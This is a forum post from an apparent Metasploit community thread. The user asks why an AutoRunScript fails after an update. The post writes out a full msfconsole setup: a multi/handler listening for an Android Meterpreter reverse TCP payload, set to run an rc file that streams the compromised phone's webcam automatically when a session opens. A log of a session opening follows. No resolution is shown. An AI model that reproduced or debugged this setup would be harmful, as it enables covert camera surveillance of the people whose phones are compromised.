Leonardo Gintoli

multi_console_command problem or bug

Discussion created by Leonardo Gintoli on Jun 27, 2017
Latest reply on Aug 7, 2017 by Josh Hale

Hi, I'm having problems with the multi_console_command component

That's what I run in msfconsole

Use exploit/multi/handler

Set payload android/meterpreter/ reverse_tcp


Set LPORT 3460

Set ExitOnSession false

Set AutoRunScript multi_console_command -rc scriptcamandroid.rc

Exploit -j -z


In the metasploit root is present a scriptcamandroid.rc file with the following commands:


webcam_stream -i 2 -q 45 -d 84000



After metasploit open the session, automatically start autorun with multi console command:


Session ID 1 ( -> xxx.xxx.xxx.xxx:52894) processing AutoRunScript 'multi_console_command -rc scriptcamandroid.rc'

Multi Command Execution Meterpreter Script Console




    -cl <opt> Commands to execute. The command must be enclosed in double quotes and separated by a comma.

    -h Help menu.

    -rc <opt> Text file with list of commands, one per line.

    -sl Hide commands for work in background sessions


Of course, script commands are not executed.

The problem was born since I updated metasploit through msfupdate and I updated the linux kernel

I tried to make a clean install of ubuntu and reinstall metasploit but the problem remains present.

I tried with an old version of the kali not upgraded and it works perfectly.

I also tried using an old version of metasploit with ubuntu always updated but the bug remains.

I think that there is something that does not go with new linux kernels then I would not know

i've try tochmodded script file with 777 permission but the problem stay